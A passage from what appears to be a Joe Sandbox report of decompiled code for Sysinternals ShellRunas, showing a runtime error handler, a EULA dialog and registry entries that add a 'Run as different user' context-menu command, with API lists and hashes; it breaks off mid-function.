                                                          control_flow_graph 354 406ce5-406cef 355 406cf1-406cf8 354->355 356 406d00-406d03 355->356 357 406cfa-406cfe 355->357 358 406e80-406e84 356->358 359 406d09-406d15 call 40b0dd 356->359 357->355 357->356 362 406d1b-406d25 call 40b0dd 359->362 363 406e4c-406e58 GetStdHandle 359->363 370 406d34-406d3a 362->370 371 406d27-406d2e 362->371 364 406e5a-406e5d 363->364 365 406e7f 363->365 364->365 367 406e5f-406e79 call 408fe0 WriteFile 364->367 365->358 367->365 370->365 373 406d40-406d5b call 40a659 370->373 371->363 371->370 376 406d6a-406d86 GetModuleFileNameA 373->376 377 406d5d-406d67 call 405700 373->377 379 406d88-406d9d call 40a659 376->379 380 406dae-406db9 call 408fe0 376->380 377->376 379->380 386 406d9f-406dab call 405700 379->386 387 406df3 380->387 388 406dbb-406de0 call 408fe0 call 40a5a6 380->388 386->380 389 406df5-406e06 call 40a4e5 387->389 388->387 400 406de2-406df1 call 405700 388->400 398 406e15-406e28 call 40a4e5 389->398 399 406e08-406e12 call 405700 389->399 407 406e37-406e4a call 40af20 398->407 408 406e2a-406e34 call 405700 398->408 399->398 400->389 407->365 408->407
                                                          C-Code - Quality: 61%
                                                          			E00406CE5(void* __edx, void* __fp0, intOrPtr _a4) {
                                                          				long _v4;
                                                          				void* __ebx;
                                                          				void* __ecx;
                                                          				void* __edi;
                                                          				void* __ebp;
                                                          				void* _t9;
                                                          				int _t11;
                                                          				void* _t14;
                                                          				void* _t16;
                                                          				void* _t18;
                                                          				void* _t19;
                                                          				void* _t24;
                                                          				void* _t26;
                                                          				intOrPtr _t30;
                                                          				void* _t34;
                                                          				void* _t37;
                                                          				signed int _t38;
                                                          				void** _t40;
                                                          				void* _t42;
                                                          				void* _t44;
                                                          				void* _t45;
                                                          				void* _t48;
                                                          				void* _t49;
                                                          				void* _t50;
                                                          				void* _t51;
                                                          				void* _t69;
                                                          
                                                          				_t69 = __fp0;
                                                          				_t37 = __edx;
                                                          				_t30 = _a4;
                                                          				_t38 = 0;
                                                          				while(_t30 !=  *((intOrPtr*)(0x4138d0 + _t38 * 8))) {
                                                          					_t38 = _t38 + 1;
                                                          					if(_t38 < 0x17) {
                                                          						continue;
                                                          					}
                                                          					break;
                                                          				}
                                                          				if(_t38 >= 0x17) {
                                                          					return _t9;
                                                          				}
                                                          				_push(_t44);
                                                          				if(E0040B0DD(_t44, _t69, 3) == 1) {
                                                          					L22:
                                                          					_t11 = GetStdHandle(0xfffffff4);
                                                          					_t45 = _t11;
                                                          					if(_t45 != 0 && _t45 != 0xffffffff) {
                                                          						_t40 = 0x4138d4 + _t38 * 8;
                                                          						_t11 = WriteFile(_t45,  *_t40, E00408FE0( *_t40),  &_v4, 0);
                                                          					}
                                                          					L25:
                                                          					return _t11;
                                                          				}
                                                          				_t11 = E0040B0DD(_t44, _t69, 3);
                                                          				_pop(_t34);
                                                          				if(_t11 != 0 ||  *0x413000 != 1) {
                                                          					if(_t30 == 0xfc) {
                                                          						goto L25;
                                                          					}
                                                          					_t14 = E0040A659(_t37, 0x414548, _t69, 0x414548, 0x314, "Runtime Error!\n\nProgram: ");
                                                          					_t49 = _t48 + 0xc;
                                                          					if(_t14 != 0) {
                                                          						_push(0);
                                                          						_push(0);
                                                          						_push(0);
                                                          						_push(0);
                                                          						_push(0);
                                                          						E00405700(0x314, _t34, _t37, _t38);
                                                          						_t49 = _t49 + 0x14;
                                                          					}
                                                          					 *0x414665 = 0;
                                                          					if(GetModuleFileNameA(0, 0x414561, 0x104) == 0) {
                                                          						_t26 = E0040A659(_t37, 0x414548, _t69, 0x414561, 0x2fb, "<program name unknown>");
                                                          						_t49 = _t49 + 0xc;
                                                          						if(_t26 != 0) {
                                                          							_push(0);
                                                          							_push(0);
                                                          							_push(0);
                                                          							_push(0);
                                                          							_push(0);
                                                          							E00405700(0x314, _t34, _t37, _t38);
                                                          							_t49 = _t49 + 0x14;
                                                          						}
                                                          					}
                                                          					_t16 = E00408FE0(0x414561);
                                                          					_pop(_t35);
                                                          					if(_t16 + 1 <= 0x3c) {
                                                          						L16:
                                                          						_t42 = 0;
                                                          						goto L17;
                                                          					} else {
                                                          						_t23 = E00408FE0(0x414561) + 0x414526;
                                                          						_t35 = 0x41485c - E00408FE0(0x414561) + 0x414526;
                                                          						_t24 = E0040A5A6(_t37, _t69, _t23, 0x41485c - E00408FE0(0x414561) + 0x414526, "...", 3);
                                                          						_t49 = _t49 + 0x14;
                                                          						if(_t24 == 0) {
                                                          							goto L16;
                                                          						}
                                                          						_t42 = 0;
                                                          						_push(0);
                                                          						_push(0);
                                                          						_push(0);
                                                          						_push(0);
                                                          						_push(0);
                                                          						E00405700(0x314, _t35, _t37, _t38);
                                                          						_t49 = _t49 + 0x14;
                                                          						L17:
                                                          						_t18 = E0040A4E5(_t37, 0x414548, _t69, 0x414548, 0x314, "\n\n");
                                                          						_t50 = _t49 + 0xc;
                                                          						if(_t18 != 0) {
                                                          							_push(_t42);
                                                          							_push(_t42);
                                                          							_push(_t42);
                                                          							_push(_t42);
                                                          							_push(_t42);
                                                          							E00405700(0x314, _t35, _t37, _t38);
                                                          							_t50 = _t50 + 0x14;
                                                          						}
                                                          						_t19 = E0040A4E5(_t37, 0x414548, _t69, 0x414548, 0x314,  *(0x4138d4 + _t38 * 8));
                                                          						_t51 = _t50 + 0xc;
                                                          						if(_t19 != 0) {
                                                          							_push(_t42);
                                                          							_push(_t42);
                                                          							_push(_t42);
                                                          							_push(_t42);
                                                          							_push(_t42);
                                                          							E00405700(0x314, _t35, _t37, _t38);
                                                          							_t51 = _t51 + 0x14;
                                                          						}
                                                          						_t11 = E0040AF20(_t37, _t69, 0x414548, "Microsoft Visual C++ Runtime Library", 0x12010);
                                                          						goto L25;
                                                          					}
                                                          				} else {
                                                          					goto L22;
                                                          				}
                                                          			}





























                                                          0x00406ce5
                                                          0x00406ce5
                                                          0x00406ce7
                                                          0x00406cef
                                                          0x00406cf1
                                                          0x00406cfa
                                                          0x00406cfe
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cfe
                                                          0x00406d03
                                                          0x00406e84
                                                          0x00406e84
                                                          0x00406d09
                                                          0x00406d15
                                                          0x00406e4c
                                                          0x00406e4e
                                                          0x00406e54
                                                          0x00406e58
                                                          0x00406e66
                                                          0x00406e79
                                                          0x00406e79
                                                          0x00406e7f
                                                          0x00000000
                                                          0x00406e7f
                                                          0x00406d1d
                                                          0x00406d24
                                                          0x00406d25
                                                          0x00406d3a
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d51
                                                          0x00406d56
                                                          0x00406d5b
                                                          0x00406d5d
                                                          0x00406d5e
                                                          0x00406d5f
                                                          0x00406d60
                                                          0x00406d61
                                                          0x00406d62
                                                          0x00406d67
                                                          0x00406d67
                                                          0x00406d77
                                                          0x00406d86
                                                          0x00406d93
                                                          0x00406d98
                                                          0x00406d9d
                                                          0x00406da1
                                                          0x00406da2
                                                          0x00406da3
                                                          0x00406da4
                                                          0x00406da5
                                                          0x00406da6
                                                          0x00406dab
                                                          0x00406dab
                                                          0x00406d9d
                                                          0x00406daf
                                                          0x00406db8
                                                          0x00406db9
                                                          0x00406df3
                                                          0x00406df3
                                                          0x00000000
                                                          0x00406dbb
                                                          0x00406dc4
                                                          0x00406dd2
                                                          0x00406dd6
                                                          0x00406ddb
                                                          0x00406de0
                                                          0x00000000
                                                          0x00000000
                                                          0x00406de2
                                                          0x00406de4
                                                          0x00406de5
                                                          0x00406de6
                                                          0x00406de7
                                                          0x00406de8
                                                          0x00406de9
                                                          0x00406dee
                                                          0x00406df5
                                                          0x00406dfc
                                                          0x00406e01
                                                          0x00406e06
                                                          0x00406e08
                                                          0x00406e09
                                                          0x00406e0a
                                                          0x00406e0b
                                                          0x00406e0c
                                                          0x00406e0d
                                                          0x00406e12
                                                          0x00406e12
                                                          0x00406e1e
                                                          0x00406e23
                                                          0x00406e28
                                                          0x00406e2a
                                                          0x00406e2b
                                                          0x00406e2c
                                                          0x00406e2d
                                                          0x00406e2e
                                                          0x00406e2f
                                                          0x00406e34
                                                          0x00406e34
                                                          0x00406e42
                                                          0x00000000
                                                          0x00406e47
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • _strcpy_s.LIBCMT ref: 00406D51
                                                          • __invoke_watson.LIBCMT ref: 00406D62
                                                          • GetModuleFileNameA.KERNEL32(00000000,00414561,00000104), ref: 00406D7E
                                                          • _strcpy_s.LIBCMT ref: 00406D93
                                                          • __invoke_watson.LIBCMT ref: 00406DA6
                                                          • _strlen.LIBCMT ref: 00406DAF
                                                          • _strlen.LIBCMT ref: 00406DBC
                                                          • __invoke_watson.LIBCMT ref: 00406DE9
                                                          • _strcat_s.LIBCMT ref: 00406DFC
                                                          • __invoke_watson.LIBCMT ref: 00406E0D
                                                          • _strcat_s.LIBCMT ref: 00406E1E
                                                          • __invoke_watson.LIBCMT ref: 00406E2F
                                                          • GetStdHandle.KERNEL32(000000F4,?,?,00000000,77D74620,00000003,00406EB1,000000FC,00403572,?,?,00000000,?,00401E38,00000000,?), ref: 00406E4E
                                                          • _strlen.LIBCMT ref: 00406E6F
                                                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,00401E38,00000000,?,?), ref: 00406E79
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_jsc.jbxd
                                                          Similarity
                                                          • API ID: __invoke_watson$_strlen$File_strcat_s_strcpy_s$HandleModuleNameWrite
                                                          • String ID: ...$<program name unknown>$HEA$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $\HA$aEA
                                                          • API String ID: 1879448924-3572076021
                                                          • Opcode ID: d3af22cc10ca9b44eb9083e57a25194163f1f7ec8eb41c9ad0b68adc3b984521
                                                          • Instruction ID: b7283139e289806ab696c21597f2b912ea31a9b8ad5217b72df3c15dadb4aa87
                                                          • Opcode Fuzzy Hash: d3af22cc10ca9b44eb9083e57a25194163f1f7ec8eb41c9ad0b68adc3b984521
                                                          • Instruction Fuzzy Hash: 133118B6A003116AE6203375DC0AF6B364D9B61759F16013BFD4AB12C3EE7D892581FE
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 413 401470-4014b9 call 403227 RegCreateKeyW 416 4014e2-4014e9 413->416 417 4014bb-4014dc RegQueryValueExW 413->417 418 4017a7-4017be RegSetValueExW 416->418 419 4014ef-40153f LocalAlloc LoadLibraryW 416->419 417->416 421 4017c4-4017f0 RegCloseKey call 40318a 418->421 420 401541-40154e 419->420 420->420 422 401550-401562 420->422 424 401564-401571 422->424 424->424 426 401573-4015bd 424->426 427 4015c0-4015cd 426->427 427->427 428 4015cf-401629 427->428 429 401630-40163d 428->429 429->429 430 40163f-40168c 429->430 431 401690-40169d 430->431 431->431 432 40169f-4016ed 431->432 433 4016f0-4016fd 432->433 433->433 434 4016ff-401742 433->434 435 401743-401750 434->435 435->435 436 401752-40175e 435->436 437 401760-40176d 436->437 437->437 438 40176f-4017a5 DialogBoxIndirectParamW LocalFree 437->438 438->418 438->421
                                                          C-Code - Quality: 88%
                                                          			E00401470(char _a4) {
                                                          				int _v0;
                                                          				signed int _v4;
                                                          				short _v524;
                                                          				int _v528;
                                                          				void* _v532;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				signed int _t76;
                                                          				signed short* _t89;
                                                          				signed short* _t90;
                                                          				signed int _t92;
                                                          				short* _t93;
                                                          				short* _t94;
                                                          				void* _t95;
                                                          				signed int _t98;
                                                          				short* _t99;
                                                          				short* _t100;
                                                          				void* _t101;
                                                          				signed int _t104;
                                                          				short* _t105;
                                                          				short* _t106;
                                                          				void* _t107;
                                                          				signed int _t110;
                                                          				short* _t111;
                                                          				short* _t112;
                                                          				void* _t113;
                                                          				signed int _t116;
                                                          				signed short* _t117;
                                                          				signed short* _t118;
                                                          				void* _t123;
                                                          				signed int _t129;
                                                          				signed int _t130;
                                                          				signed short* _t131;
                                                          				signed short* _t133;
                                                          				signed short* _t134;
                                                          				signed short* _t135;
                                                          				void* _t137;
                                                          				signed int _t138;
                                                          				void* _t143;
                                                          				void* _t145;
                                                          				void* _t147;
                                                          				void* _t149;
                                                          				void* _t151;
                                                          				void* _t153;
                                                          				void* _t154;
                                                          				void* _t155;
                                                          				void* _t157;
                                                          				int* _t158;
                                                          				int* _t159;
                                                          				int* _t160;
                                                          				int* _t161;
                                                          				int* _t162;
                                                          				signed int _t163;
                                                          				signed int _t164;
                                                          				signed int _t165;
                                                          				signed int _t166;
                                                          				signed int _t167;
                                                          				void* _t169;
                                                          				void* _t170;
                                                          				void* _t171;
                                                          				int _t172;
                                                          				signed int _t175;
                                                          				signed int _t176;
                                                          
                                                          				_t175 =  &_v532;
                                                          				_t76 =  *0x413004; // 0xf284055d
                                                          				_v4 = _t76 ^ _t175;
                                                          				_t172 = 0;
                                                          				_v532 = 0;
                                                          				E00403227(_t170,  &_v524, L"Software\\Sysinternals\\%s", L"ShellRunas - Sysinternals: www.sysinternals.com");
                                                          				_t176 = _t175 + 0xc;
                                                          				if(RegCreateKeyW(0x80000001,  &_v524,  &_v532) == 0) {
                                                          					_v528 = 4;
                                                          					RegQueryValueExW(_v532, L"EulaAccepted", 0, 0,  &_a4,  &_v528);
                                                          				}
                                                          				if(_a4 != _t172) {
                                                          					L20:
                                                          					RegSetValueExW(_v532, L"EulaAccepted", _t172, 4,  &_a4, 4);
                                                          				} else {
                                                          					_push(_t170);
                                                          					_push(_t157);
                                                          					_t171 = LocalAlloc(0x40, 0x3e8);
                                                          					_t11 = _t171 + 0x12; // 0x12
                                                          					_t158 = _t11;
                                                          					LoadLibraryW(L"Riched32.dll");
                                                          					 *_t171 = 0x80c808d0;
                                                          					 *(_t171 + 0xa) = _t172;
                                                          					 *(_t171 + 0xc) = _t172;
                                                          					 *((short*)(_t171 + 0xe)) = 0x138;
                                                          					 *((short*)(_t171 + 0x10)) = 0xb4;
                                                          					 *(_t171 + 8) = _t172;
                                                          					 *_t158 = _t172;
                                                          					_t159 =  &(_t158[0]);
                                                          					 *_t159 = _t172;
                                                          					_t160 =  &(_t159[0]);
                                                          					_t89 = L"License Agreement";
                                                          					_t143 = _t160 - _t89;
                                                          					do {
                                                          						_t129 =  *_t89 & 0x0000ffff;
                                                          						 *(_t143 + _t89) = _t129;
                                                          						_t89 =  &(_t89[1]);
                                                          					} while (_t129 != _t172);
                                                          					_t161 =  &(_t160[9]);
                                                          					 *_t161 = 8;
                                                          					_t162 =  &(_t161[0]);
                                                          					_t90 = L"MS Shell Dlg";
                                                          					_t145 = _t162 - _t90;
                                                          					do {
                                                          						_t130 =  *_t90 & 0x0000ffff;
                                                          						 *(_t145 + _t90) = _t130;
                                                          						_t90 =  &(_t90[1]);
                                                          					} while (_t130 != _t172);
                                                          					_t19 =  &(_t162[7]); // 0x5
                                                          					_t92 = _t19 & 0xfffffffc;
                                                          					 *((short*)(_t92 + 8)) = 7;
                                                          					 *((short*)(_t92 + 0xa)) = 3;
                                                          					 *((short*)(_t92 + 0xc)) = 0x12a;
                                                          					 *((short*)(_t92 + 0x10)) = 0x1f6;
                                                          					 *_t92 = 0x50000000;
                                                          					_push(_t123);
                                                          					 *((short*)(_t92 + 0xe)) = 0xe;
                                                          					_t93 = _t92 + 0x12;
                                                          					 *_t93 = 0xffff;
                                                          					_t94 = _t93 + 2;
                                                          					 *_t94 = 0x82;
                                                          					_t95 = _t94 + 2;
                                                          					_t131 = L"You can also use the /accepteula command-line switch to accept the EULA.";
                                                          					_t147 = _t95 - _t131;
                                                          					do {
                                                          						_t163 =  *_t131 & 0x0000ffff;
                                                          						 *(_t147 + _t131) = _t163;
                                                          						_t131 =  &(_t131[1]);
                                                          					} while (_t163 != _t172);
                                                          					 *(_t95 + 0x92) = _t172;
                                                          					_t98 = _t95 + 0x97 & 0xfffffffc;
                                                          					 *(_t171 + 8) =  *(_t171 + 8) + 1;
                                                          					 *((short*)(_t98 + 0x10)) = 1;
                                                          					 *((short*)(_t98 + 8)) = 0xc9;
                                                          					 *((short*)(_t98 + 0xa)) = 0x9f;
                                                          					 *((short*)(_t98 + 0xe)) = 0xe;
                                                          					 *_t98 = 0x50010000;
                                                          					 *((short*)(_t98 + 0xc)) = 0x32;
                                                          					_t99 = _t98 + 0x12;
                                                          					 *_t99 = 0xffff;
                                                          					_t100 = _t99 + 2;
                                                          					 *_t100 = 0x80;
                                                          					_t101 = _t100 + 2;
                                                          					_t133 = L"&Agree";
                                                          					_t149 = _t101 - _t133;
                                                          					do {
                                                          						_t164 =  *_t133 & 0x0000ffff;
                                                          						 *(_t149 + _t133) = _t164;
                                                          						_t133 =  &(_t133[1]);
                                                          					} while (_t164 != 0);
                                                          					 *(_t101 + 0xe) = _t164;
                                                          					 *(_t171 + 8) =  *(_t171 + 8) + 1;
                                                          					_t104 = _t101 + 0x13 & 0xfffffffc;
                                                          					 *((short*)(_t104 + 8)) = 0xff;
                                                          					 *((short*)(_t104 + 0xa)) = 0x9f;
                                                          					 *((short*)(_t104 + 0xc)) = 0x32;
                                                          					 *((short*)(_t104 + 0xe)) = 0xe;
                                                          					 *((short*)(_t104 + 0x10)) = 2;
                                                          					 *_t104 = 0x50010000;
                                                          					_t105 = _t104 + 0x12;
                                                          					 *_t105 = 0xffff;
                                                          					_t106 = _t105 + 2;
                                                          					 *_t106 = 0x80;
                                                          					_t107 = _t106 + 2;
                                                          					_t134 = L"&Decline";
                                                          					_t151 = _t107 - _t134;
                                                          					do {
                                                          						_t165 =  *_t134 & 0x0000ffff;
                                                          						 *(_t151 + _t134) = _t165;
                                                          						_t134 =  &(_t134[1]);
                                                          					} while (_t165 != 0);
                                                          					 *(_t107 + 0x12) = _t165;
                                                          					 *(_t171 + 8) =  *(_t171 + 8) + 1;
                                                          					_t110 = _t107 + 0x17 & 0xfffffffc;
                                                          					 *((short*)(_t110 + 8)) = 7;
                                                          					 *((short*)(_t110 + 0xa)) = 0x9f;
                                                          					 *((short*)(_t110 + 0xc)) = 0x32;
                                                          					 *((short*)(_t110 + 0xe)) = 0xe;
                                                          					 *((short*)(_t110 + 0x10)) = 0x1f5;
                                                          					 *_t110 = 0x50010000;
                                                          					_t111 = _t110 + 0x12;
                                                          					 *_t111 = 0xffff;
                                                          					_t112 = _t111 + 2;
                                                          					 *_t112 = 0x80;
                                                          					_t113 = _t112 + 2;
                                                          					_t135 = L"&Print";
                                                          					_t153 = _t113 - _t135;
                                                          					do {
                                                          						_t166 =  *_t135 & 0x0000ffff;
                                                          						 *(_t153 + _t135) = _t166;
                                                          						_t135 =  &(_t135[1]);
                                                          					} while (_t166 != 0);
                                                          					 *(_t113 + 0xe) = _t166;
                                                          					_t116 = _t113 + 0x13 & 0xfffffffc;
                                                          					 *(_t171 + 8) =  *(_t171 + 8) + 1;
                                                          					_t56 = _t116 + 0x12; // -249
                                                          					_t154 = _t56;
                                                          					 *((short*)(_t116 + 0xa)) = 0xe;
                                                          					 *((short*)(_t116 + 8)) = 7;
                                                          					 *((short*)(_t116 + 0xc)) = 0x12a;
                                                          					 *((short*)(_t116 + 0xe)) = 0x8c;
                                                          					 *((short*)(_t116 + 0x10)) = 0x1f4;
                                                          					 *_t116 = 0x50a11844;
                                                          					_t117 = L"RICHEDIT";
                                                          					_t137 = _t154 - _t117;
                                                          					_pop(_t123);
                                                          					do {
                                                          						_t167 =  *_t117 & 0x0000ffff;
                                                          						 *(_t137 + _t117) = _t167;
                                                          						_t117 =  &(_t117[1]);
                                                          					} while (_t167 != 0);
                                                          					_t155 = _t154 + 0x12;
                                                          					_t118 = L"&Decline";
                                                          					_t169 = _t155 - _t118;
                                                          					do {
                                                          						_t138 =  *_t118 & 0x0000ffff;
                                                          						 *(_t169 + _t118) = _t138;
                                                          						_t118 =  &(_t118[1]);
                                                          					} while (_t138 != 0);
                                                          					 *(_t155 + 0x12) = _t138;
                                                          					 *(_t171 + 8) =  *(_t171 + 8) + 1;
                                                          					_v0 = DialogBoxIndirectParamW(0, _t171, 0, E00401310, L"ShellRunas - Sysinternals: www.sysinternals.com");
                                                          					LocalFree(_t171);
                                                          					_t172 = 0;
                                                          					_pop(_t157);
                                                          					_pop(_t170);
                                                          					if(_v0 != 0) {
                                                          						goto L20;
                                                          					}
                                                          				}
                                                          				RegCloseKey(_v532);
                                                          				return E0040318A(0 | _a4 != _t172, _t123, _v4 ^ _t176, _v532, _t157, _t170);
                                                          			}




































































                                                          0x00401470
                                                          0x00401476
                                                          0x0040147d
                                                          0x00401493
                                                          0x00401496
                                                          0x0040149a
                                                          0x0040149f
                                                          0x004014b9
                                                          0x004014d4
                                                          0x004014dc
                                                          0x004014dc
                                                          0x004014e9
                                                          0x004017a7
                                                          0x004017be
                                                          0x004014ef
                                                          0x004014ef
                                                          0x004014f0
                                                          0x004014fe
                                                          0x00401505
                                                          0x00401505
                                                          0x00401508
                                                          0x0040150e
                                                          0x00401514
                                                          0x00401518
                                                          0x0040151c
                                                          0x00401522
                                                          0x00401528
                                                          0x0040152c
                                                          0x0040152f
                                                          0x00401532
                                                          0x00401535
                                                          0x00401538
                                                          0x0040153f
                                                          0x00401541
                                                          0x00401541
                                                          0x00401544
                                                          0x00401548
                                                          0x0040154b
                                                          0x00401550
                                                          0x00401553
                                                          0x00401558
                                                          0x0040155b
                                                          0x00401562
                                                          0x00401564
                                                          0x00401564
                                                          0x00401567
                                                          0x0040156b
                                                          0x0040156e
                                                          0x00401573
                                                          0x00401576
                                                          0x00401579
                                                          0x0040157f
                                                          0x00401585
                                                          0x0040158b
                                                          0x00401591
                                                          0x00401597
                                                          0x0040159d
                                                          0x004015a1
                                                          0x004015a4
                                                          0x004015a9
                                                          0x004015ac
                                                          0x004015b1
                                                          0x004015b4
                                                          0x004015bb
                                                          0x004015c0
                                                          0x004015c0
                                                          0x004015c3
                                                          0x004015c7
                                                          0x004015ca
                                                          0x004015cf
                                                          0x004015de
                                                          0x004015e6
                                                          0x004015ea
                                                          0x004015ee
                                                          0x004015f4
                                                          0x004015fa
                                                          0x004015fe
                                                          0x00401609
                                                          0x0040160d
                                                          0x00401610
                                                          0x00401615
                                                          0x00401618
                                                          0x0040161d
                                                          0x00401620
                                                          0x00401627
                                                          0x00401630
                                                          0x00401630
                                                          0x00401633
                                                          0x00401637
                                                          0x0040163a
                                                          0x0040163f
                                                          0x00401643
                                                          0x0040164d
                                                          0x00401650
                                                          0x00401656
                                                          0x0040165c
                                                          0x00401660
                                                          0x00401664
                                                          0x0040166a
                                                          0x00401670
                                                          0x00401673
                                                          0x00401678
                                                          0x0040167b
                                                          0x00401680
                                                          0x00401683
                                                          0x0040168a
                                                          0x00401690
                                                          0x00401690
                                                          0x00401693
                                                          0x00401697
                                                          0x0040169a
                                                          0x0040169f
                                                          0x004016a3
                                                          0x004016ae
                                                          0x004016b1
                                                          0x004016b7
                                                          0x004016bd
                                                          0x004016c1
                                                          0x004016c5
                                                          0x004016cb
                                                          0x004016d1
                                                          0x004016d4
                                                          0x004016d9
                                                          0x004016dc
                                                          0x004016e1
                                                          0x004016e4
                                                          0x004016eb
                                                          0x004016f0
                                                          0x004016f0
                                                          0x004016f3
                                                          0x004016f7
                                                          0x004016fa
                                                          0x004016ff
                                                          0x00401708
                                                          0x00401710
                                                          0x00401714
                                                          0x00401714
                                                          0x00401717
                                                          0x0040171b
                                                          0x00401721
                                                          0x00401727
                                                          0x0040172d
                                                          0x00401733
                                                          0x00401739
                                                          0x00401740
                                                          0x00401742
                                                          0x00401743
                                                          0x00401743
                                                          0x00401746
                                                          0x0040174a
                                                          0x0040174d
                                                          0x00401752
                                                          0x00401755
                                                          0x0040175c
                                                          0x00401760
                                                          0x00401760
                                                          0x00401763
                                                          0x00401767
                                                          0x0040176a
                                                          0x0040177c
                                                          0x00401780
                                                          0x0040178d
                                                          0x00401794
                                                          0x0040179a
                                                          0x004017a3
                                                          0x004017a4
                                                          0x004017a5
                                                          0x00000000
                                                          0x00000000
                                                          0x004017a5
                                                          0x004017c9
                                                          0x004017f0

                                                          APIs
                                                          • __swprintf.LIBCMT ref: 0040149A
                                                          • RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 004014B1
                                                          • RegQueryValueExW.ADVAPI32 ref: 004014DC
                                                          • LocalAlloc.KERNEL32(00000040,000003E8,?,?,?,?,00000000), ref: 004014F8
                                                          • LoadLibraryW.KERNEL32(Riched32.dll,?,?,?,00000000), ref: 00401508
                                                          • DialogBoxIndirectParamW.USER32 ref: 00401786
                                                          • LocalFree.KERNEL32(00000000,?,?,?,00000000), ref: 00401794
                                                          • RegSetValueExW.ADVAPI32(?,EulaAccepted,00000000,00000004,?,00000004,?,?,00000000), ref: 004017BE
                                                          • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 004017C9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_jsc.jbxd
                                                          Similarity
                                                          • API ID: LocalValue$AllocCloseCreateDialogFreeIndirectLibraryLoadParamQuery__swprintf
                                                          • String ID: &Agree$&Decline$&Print$EulaAccepted$License Agreement$MS Shell Dlg$RICHEDIT$Riched32.dll$ShellRunas - Sysinternals: www.sysinternals.com$Software\Sysinternals\%s$You can also use the /accepteula command-line switch to accept the EULA.
                                                          • API String ID: 1839599301-707968945
                                                          • Opcode ID: f4e69aa77bff61b704e8fbccd0d93f2c3052f5bef0e29b2b67b4d8038d72d3e8
                                                          • Instruction ID: 154b2d0257e82f6b0cd4e7c6326ce2309e60fd29fcbd71df3831e51aaf4186b5
                                                          • Opcode Fuzzy Hash: f4e69aa77bff61b704e8fbccd0d93f2c3052f5bef0e29b2b67b4d8038d72d3e8
                                                          • Instruction Fuzzy Hash: C7919CB29603008BC3218F24C81AB92B3B0FF95314F5A955DE5899F3B2F7B8C585C75A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 439 4019f0-401a30 RegCreateKeyExW 440 401b82-401b98 call 40318a 439->440 441 401a36-401a55 RegCreateKeyExW 439->441 442 401b78-401b81 RegCloseKey 441->442 443 401a5b-401a7c RegCreateKeyExW 441->443 442->440 445 401b71-401b76 RegCloseKey 443->445 446 401a82-401a89 443->446 445->442 448 401a90-401aad RegCreateKeyExW 446->448 449 401a8b 446->449 450 401ab3-401acf RegCreateKeyExW 448->450 451 401b6a-401b6f RegCloseKey 448->451 449->448 452 401b63-401b68 RegCloseKey 450->452 453 401ad5-401ae8 GetModuleFileNameW 450->453 451->445 452->451 454 401b03-401b19 453->454 455 401aea-401b01 453->455 456 401b1a-401b2c call 4032bd 454->456 455->456 459 401b30-401b39 456->459 459->459 460 401b3b-401b61 RegSetValueW RegCloseKey 459->460 460->452
                                                          C-Code - Quality: 68%
                                                          			E004019F0(void* __ebx, int __ecx, short* _a4) {
                                                          				signed int _v4;
                                                          				short _v1044;
                                                          				short _v1564;
                                                          				void* _v1568;
                                                          				void* _v1572;
                                                          				void* _v1576;
                                                          				void* _v1580;
                                                          				void* _v1584;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				signed int _t28;
                                                          				int _t31;
                                                          				short* _t38;
                                                          				int* _t39;
                                                          				struct HINSTANCE__* _t43;
                                                          				intOrPtr* _t48;
                                                          				void* _t55;
                                                          				intOrPtr _t64;
                                                          				void* _t75;
                                                          				void* _t77;
                                                          				int _t78;
                                                          				signed int _t82;
                                                          
                                                          				_t55 = __ebx;
                                                          				_t82 =  &_v1584;
                                                          				_t28 =  *0x413004; // 0xf284055d
                                                          				_v4 = _t28 ^ _t82;
                                                          				_t77 = RegCreateKeyExW;
                                                          				_t78 = __ecx;
                                                          				_t31 = RegCreateKeyExW(0x80000001, _a4, 0, 0, 0, 4, 0,  &_v1576, 0);
                                                          				if(_t31 == 0) {
                                                          					_t78 = RegCreateKeyExW(_v1576, _t78, _t31, _t31, _t31, 4, _t31,  &_v1584, _t31);
                                                          					if(_t78 == 0) {
                                                          						_t78 = RegCreateKeyExW(_v1584, L"Shell", 0, 0, 0, 4, 0,  &_v1572, 0);
                                                          						if(_t78 == 0) {
                                                          							_t38 = L"Run as different user (netonly)...";
                                                          							if(__ebx == 0) {
                                                          								_t38 = L"Run as different user...";
                                                          							}
                                                          							_t39 = RegCreateKeyExW(_v1572, _t38, 0, 0, 0, 4, 0,  &_v1568, 0);
                                                          							_t78 = _t39;
                                                          							if(_t78 == 0) {
                                                          								_t43 = RegCreateKeyExW(_v1568, L"Command", _t78, _t78, _t78, 6, _t78,  &_v1580, _t39);
                                                          								_t78 = _t43;
                                                          								if(_t78 == 0) {
                                                          									GetModuleFileNameW(_t43,  &_v1564, 0x104);
                                                          									if(_t55 == 0) {
                                                          										_push( &_v1564);
                                                          										_push(L"\"%s\" \"%%1\" %%*");
                                                          										_push(0x208);
                                                          										_push( &_v1044);
                                                          									} else {
                                                          										_push( &_v1564);
                                                          										_push(L"\"%s\" /netonly \"%%1\" %%*");
                                                          										_push(0x208);
                                                          										_push( &_v1044);
                                                          									}
                                                          									E004032BD();
                                                          									_t48 =  &_v1044;
                                                          									_t82 = _t82 + 0x10;
                                                          									_t75 = _t48 + 2;
                                                          									do {
